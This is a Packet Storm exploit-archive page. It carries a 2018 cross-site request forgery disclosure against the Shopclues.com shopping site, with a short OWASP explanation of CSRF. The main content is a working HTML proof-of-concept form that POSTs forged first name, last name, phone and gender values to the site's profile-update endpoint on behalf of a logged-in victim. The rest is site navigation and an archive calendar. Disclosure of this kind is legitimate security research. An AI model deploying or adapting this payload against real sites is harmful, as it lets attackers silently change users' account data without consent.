exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Shopclues.com Cross Site Request Forgery

Shopclues.com Cross Site Request Forgery
Posted Jul 24, 2018
Authored by Ismail Tasdelen

Shopclues.com suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 54416471ae2905130188771f4a2e7246256f764425bbd4a741f7c503237ac047

Shopclues.com Cross Site Request Forgery

Change Mirror Download
# Exploit Title: [ Cross-Site Request Forgery (CSRF) at SHOPCLUES ]
# Date: [ 17.07.2018 ]
# Exploit Author: [ Ismail Tasdelen ]
# Vendor Homepage: [ https://www.shopclues.com/ ]
# Software Type : [ Website ]
# Software Version : [ N/A ]
# Vulenrability : [ Cross-Site Request Forgery (CSRF) ]
# Risk : [ Medium ]

# Description : What is Cross-Site Request Forgery (CSRF) vulnerability ?

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

Source : https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

# PoC :

<html>
<head>
<title> CSRF PoC - SHOPCLUES.COM - Update Profile Page </title>
</head>
<body>
<form action="https://myaccount.shopclues.com/index.php?dispatch=profiles.update" method="POST">
<input type="text" name="user_data%5Bfirstname%5D" value="Ismail" /><br />
<input type="text" name="user_data%5Blastname%5D" value="Tasdelen" /><br />
<input type="text" name="user_data%5Bphone%5D" value="00905554443322" /><br />
<input type="text" name="user_data%5Bgender%5D" value="M" /><br />
<input type='submit' name="dispatch[profiles.update.$_action]" value='Go!' />
</form>
</body>
</html>

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://packetstormsecurity.com/user/ismailtasdelen
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    12 Files
  • 23
    Oct 23rd
    23 Files
  • 24
    Oct 24th
    9 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close